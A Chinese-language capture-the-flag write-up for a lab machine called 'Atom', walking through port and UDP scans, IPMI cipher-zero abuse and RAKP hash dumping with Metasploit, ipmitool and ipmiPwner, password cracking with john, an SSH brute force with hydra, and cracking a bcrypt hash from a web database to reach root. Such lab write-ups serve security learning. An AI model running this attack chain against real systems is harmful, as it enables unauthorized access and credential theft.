Atom
Atom
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali💀kali)-[~/temp/Atom]
└─$ rustscan -a $IP -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.20.10.3:22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb/34BxFp2oBx8o5xuZVXS1cE9nAlE=
| 256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
让我联想到了前不久爆的那个新漏洞,但是好像不好利用,看群友也没有利用成功,先搁置。
漏洞发现
UDP扫描
看不到别的利用点,尝试UDP扫描一下,为了省时间仅扫描前一万端口:
1
2
3
4
5
6
7
┌──(kali💀kali)-[~/temp/Atom]
└─$ sudo nmap -sU $IP -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-18 11:30 EDT
Stats: 0:03:19 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 0.32% done
Stats: 0:05:54 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 0.56% done
发现扫描速度过慢了。。。。尝试换一下参数,筛选最常用的100个端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali💀kali)-[~/temp/Atom]
└─$ sudo nmap -sU -sV --version-intensity 0 -n -F -T4 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-18 11:41 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 32.17% done; ETC: 11:42 (0:00:21 remaining)
Nmap scan report for 172.20.10.3
Host is up (0.00079s latency).
Not shown: 61 open|filtered udp ports (no-response), 38 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
MAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.55 seconds
-sU: 这个选项告诉nmap仅扫描 UDP 端口。默认情况下,nmap会同时扫描 TCP 和 UDP 端口,但如果你只对 UDP 端口感兴趣,可以使用这个选项。-sV: 这个选项使nmap尝试确定目标机器上开放端口的服务版本信息。这通过向端口发送一系列探测包并解析响应来实现。--version-intensity 0: 这个选项用于调整版本检测的强度。强度值从 0 到 9,其中 0 表示非常轻量级的检测(仅发送一些基本的探测包),而 9 表示最彻底的检测(可能会发送大量的探测包,但可能会花费更多时间并暴露更多的扫描活动)。-n: 这个选项告诉nmap在进行扫描时不要进行 DNS 解析。这可以加快扫描速度,特别是在扫描大量 IP 地址时,因为 DNS 解析可能会成为瓶颈。-F: 这个选项是--fast的简写,它使nmap更快地进行扫描。它会减少扫描的端口数量(只扫描最常见的 100 个端口),并可能减少扫描时间或发送的探测包数量。这对于快速获取目标系统的基本信息很有用。-T4: 这个选项用于设置扫描的时间模板。nmap提供了几种不同的时间模板(从 0 到 5),其中 0 是最慢的(最隐蔽的),而 5 是最快的(但可能更容易被检测到)。-T4是一个中等速度的设置,它在扫描速度和隐蔽性之间做了一个折中。
速度快的雅痞,nice!,尝试看一下这个端口是个神魔:https://book.hacktricks.xyz/network-services-pentesting/623-udp-ipmi
尝试进行信息搜集:
ipmi信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali💀kali)-[~/temp/Atom]
└─$ sudo nmap -sU --script ipmi-version -p 623 $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-18 11:48 EDT
Nmap scan report for 172.20.10.3
Host is up (0.00084s latency).
PORT STATE SERVICE
623/udp open asf-rmcp
| ipmi-version:
| Version:
| IPMI-2.0
| UserAuth: password, md5, md2, null
| PassAuth: auth_msg, auth_user, non_null_user
|_ Level: 1.5, 2.0
MAC Address: 08:00:27:35:45:0A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
扫描一下是否存在相关身份认证绕过漏洞:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(kali💀kali)-[~/temp/Atom]
└─$ msfconsole -q
msf6 > use auxiliary/scanner/ipmi/ipmi_version
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options
Module options (auxiliary/scanner/ipmi/ipmi_version):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ipmi/ipmi_version) > set RHOSTS 172.20.10.3
RHOSTS => 172.20.10.3
msf6 auxiliary(scanner/ipmi/ipmi_version) > run
[*] Sending IPMI requests to 172.20.10.3->172.20.10.3 (1 hosts)
[+] 172.20.10.3:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_cipher_zero
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > show options
Module options (auxiliary/scanner/ipmi/ipmi_cipher_zero):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to probe in each set
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 623 yes The target port (UDP)
THREADS 10 yes The number of concurrent threads
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set rhosts 172.20.10.3
rhosts => 172.20.10.3
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
[*] Sending IPMI requests to 172.20.10.3->172.20.10.3 (1 hosts)
[+] 172.20.10.3:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
存在并可以进行利用,尝试使用工具进行利用:apt-get install ipmitool,但是要先找到用户名和密码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali💀kali)-[~/temp/Atom]
└─$ msfconsole -q
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ip yes File containing common passwords for offline cracking, one per line
mi_passwords.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-meta
sploit.html
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ip yes File containing usernames, one per line
mi_users.txt
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 172.20.10.3
rhosts => 172.20.10.3
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 172.20.10.3:623 - IPMI - Hash found: admin:a111f95082010000092609dfb9d7bddaf155a7ca936647a94a430a7cc46c896ed9721d01c8b36230a123456789abcdefa123456789abcdef140561646d696e:f086884e16c2ea6ffc95d9163d380fc94ead10c0
[+] 172.20.10.3:623 - IPMI - Hash for user 'admin' matches password 'cukorborso'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
但是找不到其他的用户密码。。。放图是因为图好看有颜色.jpg,尝试绕过 IPMI 身份验证:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(kali💀kali)-[~/temp/Atom]
└─$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
1 true false false Unknown (0x00)
2 admin true false true ADMINISTRATOR
3 analiese true false true USER
4 briella true false true USER
5 richardson true false true USER
6 carsten true false true USER
7 sibylle true false true USER
8 wai-ching true false true USER
9 jerrilee true false true USER
10 glynn true false true USER
11 asia true false true USER
12 zaylen true false true USER
13 fabien true false true USER
14 merola true false true USER
15 jem true false true USER
16 riyaz true false true USER
17 laten true false true USER
18 cati true false true USER
19 rozalia true false true USER
20 palmer true false true USER
21 onida true false true USER
22 terra true false true USER
23 ranga true false true USER
24 harrie true false true USER
25 pauly true false true USER
26 els true false true USER
27 bqb true false true USER
28 karlotte true false true USER
29 zali true false true USER
30 ende true false true USER
31 stacey true false true USER
32 shirin true false true USER
33 kaki true false true USER
34 saman true false true USER
35 kalie true false true USER
36 deshawn true false true USER
37 mayeul true false true USER
38 true false false Unknown (0x00)
39 true false false Unknown (0x00)
40 true false false Unknown (0x00)
41 true false false Unknown (0x00)
42 true false false Unknown (0x00)
43 true false false Unknown (0x00)
44 true false false Unknown (0x00)
45 true false false Unknown (0x00)
46 true false false Unknown (0x00)
47 true false false Unknown (0x00)
48 true false false Unknown (0x00)
49 true false false Unknown (0x00)
50 true false false Unknown (0x00)
51 true false false Unknown (0x00)
52 true false false Unknown (0x00)
53 true false false Unknown (0x00)
54 true false false Unknown (0x00)
55 true false false Unknown (0x00)
56 true false false Unknown (0x00)
57 true false false Unknown (0x00)
58 true false false Unknown (0x00)
59 true false false Unknown (0x00)
60 true false false Unknown (0x00)
61 true false false Unknown (0x00)
62 true false false Unknown (0x00)
63 true false false Unknown (0x00)
漏洞查找利用
尝试ssh连接但是失败,尝试利用现有漏洞:
不知道是不是使用方法有问题都没成功,尝试搜索,找到了一个新的搜索工具:
这也是dumphash的,可以尝试利用一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali💀kali)-[~/temp/Atom]
└─$ ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list | grep USER | awk -F '[ ]' '{print $3}' | uniq -u
glynn
asia
zaylen
fabien
merola
jem
riyaz
laten
cati
rozalia
palmer
onida
terra
ranga
harrie
pauly
els
bqb
karlotte
zali
ende
stacey
shirin
kaki
saman
kalie
deshawn
mayeul
导入文件进行分析:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
# git clone https://github.com/c0rnf13ld/ipmiPwner.git
# ipmitool -I lanplus -C 0 -H 172.20.10.3 -U admin -P cukorborso user list | grep USER | awk -F '[ ]' '{print $3}' | uniq -u > user
# cd ipmiPwner
# sudo ./requirements.sh
# 随便尝试一个
┌──(kali💀kali)-[~/temp/Atom/ipmiPwner]
└─$ sudo python3 ipmipwner.py --host 172.20.10.3 -u glynn -c john -pW /usr/share/wordlists/rockyou.txt -oH hash
[*] Checking if port 623 for host 172.20.10.3 is active
[*] The username: glynn is valid
[*] Saving hash for user: glynn in file: "hash"
[*] The hash for user: glynn
\_ $rakp$a4a3a2a08209000027bf9c61b838a56a9973b3df9ebf3d62123c97e7c875a1e96c914427d59d6e4aa123456789abcdefa123456789abcdef1405676c796e6e$003cce9e8c3767318b61fc6f893afd5efd3aaded[*] Starting the hash cracking with john
Using default input encoding: UTF-8
Loaded 1 password hash (RAKP, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 128/128 SSE2 4x])
Will run 2 OpenMP threads
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
evan (172.20.10.3 glynn)
1g 0:00:00:00 DONE (2024-07-18 13:12) 2.564g/s 168041p/s 168041c/s 168041C/s dyesebel..sabrina7
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali💀kali)-[~/temp/Atom/ipmiPwner]
└─$ for user in $(cat ../user); do sudo python3 ipmipwner.py --host 172.20.10.3 -u $user -c john -pW /usr/share/wordlists/rockyou.txt -oH hash >> pass; done
........
┌──(kali💀kali)-[~/temp/Atom/ipmiPwner]
└─$ cat pass | grep '(172' | awk '{print $1}'
evan
TWEETY1
120691
chatroom
mackenzie2
081704
djones
trick1
122987
batman!
phones
jiggaman
sexymoma
jaffa1
071590
515253
dezzy
290992
emeralds
poynter
tripod
castillo1
kittyboo
numberone
090506
billandben
milo123
241107
┌──(kali💀kali)-[~/temp/Atom/ipmiPwner]
└─$ cat pass | grep '(172' | awk '{print $1}' > ../pazz
爆破
尝试进行爆破:
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali💀kali)-[~/temp/Atom]
└─$ hydra -L user -P pazz ssh://172.20.10.3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-18 13:47:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 784 login tries (l:28/p:28), ~49 tries per task
[DATA] attacking ssh://172.20.10.3:22/
[STATUS] 304.00 tries/min, 304 tries in 00:01h, 482 to do in 00:02h, 14 active
[22][ssh] host: 172.20.10.3 login: onida password: jiggaman
[STATUS] 304.00 tries/min, 608 tries in 00:02h, 178 to do in 00:01h, 14 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-18 13:49:59
找到一个用户,尝试进行登录:
提权
信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
onida@atom:~$ sudo -l
-bash: sudo: command not found
onida@atom:~$ echo $SHELL
/bin/bash
onida@atom:~$ pwd
/home/onida
onida@atom:~$ ls -la
total 24
drwx------ 2 onida onida 4096 Dec 31 2400 .
drwxr-xr-x 3 root root 4096 May 24 13:55 ..
lrwxrwxrwx 1 root root 9 May 24 14:16 .bash_history -> /dev/null
-rw-r--r-- 1 onida onida 220 Dec 31 2400 .bash_logout
-rw-r--r-- 1 onida onida 3526 Dec 31 2400 .bashrc
-rw-r--r-- 1 onida onida 807 Dec 31 2400 .profile
-rwx------ 1 onida onida 33 Dec 31 2400 user.txt
onida@atom:~$ cat user.txt
f75390001fa2fe806b4e3f1e5dadeb2b
onida@atom:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/su
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1
onida@atom:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
onida@atom:~$ cd /opt
onida@atom:/opt$ ls -la
total 8
drwxr-xr-x 2 root root 4096 Mar 9 12:26 .
drwxr-xr-x 18 root root 4096 May 24 14:18 ..
onida@atom:/opt$ cd /
onida@atom:/$ ls -la
total 68
drwxr-xr-x 18 root root 4096 May 24 14:18 .
drwxr-xr-x 18 root root 4096 May 24 14:18 ..
lrwxrwxrwx 1 root root 7 Mar 9 12:26 bin -> usr/bin
drwxr-xr-x 3 root root 4096 May 24 14:18 boot
drwxr-xr-x 17 root root 3320 Jul 18 17:25 dev
drwxr-xr-x 86 root root 4096 Jul 18 17:25 etc
drwxr-xr-x 3 root root 4096 May 24 13:55 home
lrwxrwxrwx 1 root root 30 May 24 14:18 initrd.img -> boot/initrd.img-6.1.0-21-amd64
lrwxrwxrwx 1 root root 30 Mar 9 12:28 initrd.img.old -> boot/initrd.img-6.1.0-18-amd64
lrwxrwxrwx 1 root root 7 Mar 9 12:26 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Mar 9 12:26 lib64 -> usr/lib64
drwx------ 2 root root 16384 Mar 9 12:26 lost+found
drwxr-xr-x 3 root root 4096 Mar 9 12:26 media
drwxr-xr-x 2 root root 4096 Mar 9 12:26 mnt
drwxr-xr-x 2 root root 4096 Mar 9 12:26 opt
dr-xr-xr-x 148 root root 0 Jul 18 17:25 proc
drwx------ 4 root root 4096 May 27 15:43 root
drwxr-xr-x 21 root root 620 Jul 18 19:50 run
lrwxrwxrwx 1 root root 8 Mar 9 12:26 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 Mar 9 12:26 srv
dr-xr-xr-x 13 root root 0 Jul 18 17:25 sys
drwxrwxrwt 10 root root 4096 Jul 18 19:39 tmp
drwxr-xr-x 12 root root 4096 Mar 9 12:26 usr
drwxr-xr-x 12 root root 4096 May 25 22:19 var
lrwxrwxrwx 1 root root 27 May 24 14:18 vmlinuz -> boot/vmlinuz-6.1.0-21-amd64
lrwxrwxrwx 1 root root 27 Mar 9 12:28 vmlinuz.old -> boot/vmlinuz-6.1.0-18-amd64
onida@atom:/$ cd /var/www
onida@atom:/var/www$ ls -la
total 12
drwxr-xr-x 3 root root 4096 May 25 22:19 .
drwxr-xr-x 12 root root 4096 May 25 22:19 ..
drwxr-xr-x 6 www-data www-data 4096 May 27 15:21 html
onida@atom:/var/www$ cd html
onida@atom:/var/www/html$ ls -la
total 172
drwxr-xr-x 6 www-data www-data 4096 May 27 15:21 .
drwxr-xr-x 3 root root 4096 May 25 22:19 ..
-rwxr-xr-x 1 www-data www-data 114688 May 27 15:21 atom-2400-database.db
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 css
drwxr-xr-x 4 www-data www-data 4096 Dec 31 2400 img
-rw-r--r-- 1 www-data www-data 11767 Dec 31 2400 index.php
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 js
-rw-r--r-- 1 www-data www-data 6262 Dec 31 2400 login.php
-rwxr-xr-x 1 www-data www-data 1637 Dec 31 2400 profile.php
-rw-r--r-- 1 www-data www-data 5534 Dec 31 2400 register.php
drwxr-xr-x 2 www-data www-data 4096 Dec 31 2400 video
onida@atom:/var/www/html$ cat profile.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
header('Location: login.php');
exit();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Atom Owns The World</title>
<style>
body, html {
height: 100%;
margin: 0;
display: flex;
justify-content: center;
align-items: center;
font-family: 'Arial', sans-serif;
color: white;
background: none;
overflow: hidden;
}
.bg-video {
position: fixed;
top: 50%;
left: 50%;
width: 100%;
height: 100%;
object-fit: cover;
transform: translate(-50%, -50%);
z-index: -1;
}
.message-container {
text-align: center;
background-color: rgba(0, 0, 0, 0.5);
padding: 20px;
border-radius: 10px;
}
</style>
</head>
<body>
<video autoplay muted loop class="bg-video">
<source src="video/gfp-astro-timelapse.mp4" type="video/mp4">
</video>
<div class="message-container">
<?php
echo '<h1>Welcome, ' . htmlspecialchars($_SESSION['user']) . '!</h1>';
if ($_SESSION['user'] == 'atom') {
echo '<p>You\'ve finally become the root of the earth!</p>';
} else {
echo '<p>You\'ll soon be Atom\'s servant!</p>';
}
?>
</div>
</body>
</html>
onida@atom:/var/www/html$ cat atom-2400-database.db
Q�Y�&��mtableusersusersCREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
))=indexsqlite_autoindex_users_1user�$))�tablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (
id INTEGER PRIMARY KEY,
ip_address TEXT NOT NULL,
attempt_time INTEGER NOT NULL
��nKE�atom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm
��� atom
内部开放了相关端口,尝试读取数据库:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
onida@atom:/var/www/html$ sqlite3
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> .help
.archive ... Manage SQL archives
.auth ON|OFF Show authorizer callbacks
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail on|off Stop after hitting an error. Default OFF
.binary on|off Turn binary output on or off. Default OFF
.cd DIRECTORY Change the working directory to DIRECTORY
.changes on|off Show number of rows changed by SQL
.check GLOB Fail if output since .testcase does not match
.clone NEWDB Clone data into NEWDB from the existing database
.connection [close] [#] Open or close an auxiliary database connection
.databases List names and files of attached databases
.dbconfig ?op? ?val? List or change sqlite3_db_config() options
.dbinfo ?DB? Show status information about the database
.dump ?OBJECTS? Render database content as SQL
.echo on|off Turn command echo on or off
.eqp on|off|full|... Enable or disable automatic EXPLAIN QUERY PLAN
.excel Display the output of next command in spreadsheet
.exit ?CODE? Exit this program with return-code CODE
.expert EXPERIMENTAL. Suggest indexes for queries
.explain ?on|off|auto? Change the EXPLAIN formatting mode. Default: auto
.filectrl CMD ... Run various sqlite3_file_control() operations
.fullschema ?--indent? Show schema and the content of sqlite_stat tables
.headers on|off Turn display of headers on or off
.help ?-all? ?PATTERN? Show help text for PATTERN
.import FILE TABLE Import data from FILE into TABLE
.imposter INDEX TABLE Create imposter table TABLE on index INDEX
.indexes ?TABLE? Show names of indexes
.limit ?LIMIT? ?VAL? Display or change the value of an SQLITE_LIMIT
.lint OPTIONS Report potential schema issues.
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?OPTIONS? Set output mode
.nonce STRING Suspend safe mode for one command if nonce matches
.nullvalue STRING Use STRING in place of NULL values
.once ?OPTIONS? ?FILE? Output for the next SQL command only to FILE
.open ?OPTIONS? ?FILE? Close existing database and reopen FILE
.output ?FILE? Send output to FILE or stdout if FILE is omitted
.parameter CMD ... Manage SQL parameter bindings
.print STRING... Print literal STRING
.progress N Invoke progress handler after every N opcodes
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.read FILE Read input from FILE or command output
.recover Recover as much data as possible from corrupt db.
.restore ?DB? FILE Restore content of DB (default "main") from FILE
.save ?OPTIONS? FILE Write database to FILE (an alias for .backup ...)
.scanstats on|off Turn sqlite3_stmt_scanstatus() metrics on or off
.schema ?PATTERN? Show the CREATE statements matching PATTERN
.selftest ?OPTIONS? Run tests defined in the SELFTEST table
.separator COL ?ROW? Change the column and row separators
.session ?NAME? CMD ... Create or control sessions
.sha3sum ... Compute a SHA3 hash of database content
.shell CMD ARGS... Run CMD ARGS... in a system shell
.show Show the current values for various settings
.stats ?ARG? Show stats or turn stats on or off
.system CMD ARGS... Run CMD ARGS... in a system shell
.tables ?TABLE? List names of tables matching LIKE pattern TABLE
.testcase NAME Begin redirecting output to 'testcase-out.txt'
.testctrl CMD ... Run various sqlite3_test_control() operations
.timeout MS Try opening locked tables for MS milliseconds
.timer on|off Turn SQL timer on or off
.trace ?OPTIONS? Output each SQL statement as it is run
.vfsinfo ?AUX? Information about the top-level VFS
.vfslist List all available VFSes
.vfsname ?AUX? Print the name of the VFS stack
.width NUM1 NUM2 ... Set minimum column widths for columnar output
sqlite> .open atom-2400-database.db
sqlite> .databases
main: /var/www/html/atom-2400-database.db r/o
sqlite> .schema
CREATE TABLE login_attempts (
id INTEGER PRIMARY KEY,
ip_address TEXT NOT NULL,
attempt_time INTEGER NOT NULL
);
CREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
);
sqlite> .output /tmp/temp.sql
sqlite> .dump users
onida@atom:/var/www/html$ cd /tmp
onida@atom:/tmp$ ls -la
total 44
drwxrwxrwt 10 root root 4096 Jul 18 20:17 .
drwxr-xr-x 18 root root 4096 May 24 14:18 ..
drwxrwxrwt 2 root root 4096 Jul 18 17:25 .font-unix
drwxrwxrwt 2 root root 4096 Jul 18 17:25 .ICE-unix
drwx------ 3 root root 4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-apache2.service-ZaMynb
drwx------ 3 root root 4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-ModemManager.service-orjtq7
drwx------ 3 root root 4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-logind.service-Lau3sB
drwx------ 3 root root 4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-timesyncd.service-0iGCTP
-rw-r--r-- 1 onida onida 265 Jul 18 20:17 temp.sql
drwxrwxrwt 2 root root 4096 Jul 18 17:25 .X11-unix
drwxrwxrwt 2 root root 4096 Jul 18 17:25 .XIM-unix
onida@atom:/tmp$ cat temp.sql
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (
id INTEGER PRIMARY KEY,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL
);
INSERT INTO users VALUES(1,'atom','$2y$10$Z1K.4yVakZEY.Qsju3WZzukW/M3fI6BkSohYOiBQqG7pK1F2fH9Cm');
COMMIT;
尝试 hash 碰撞一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali💀kali)-[~/temp/Atom]
└─$ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
madison (?)
1g 0:00:00:02 DONE 2/3 (2024-07-18 14:19) 0.4255g/s 84.25p/s 84.25c/s 84.25C/s goodluck..mother
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
使用密码即可登录root。
本文由作者按照 CC BY 4.0 进行授权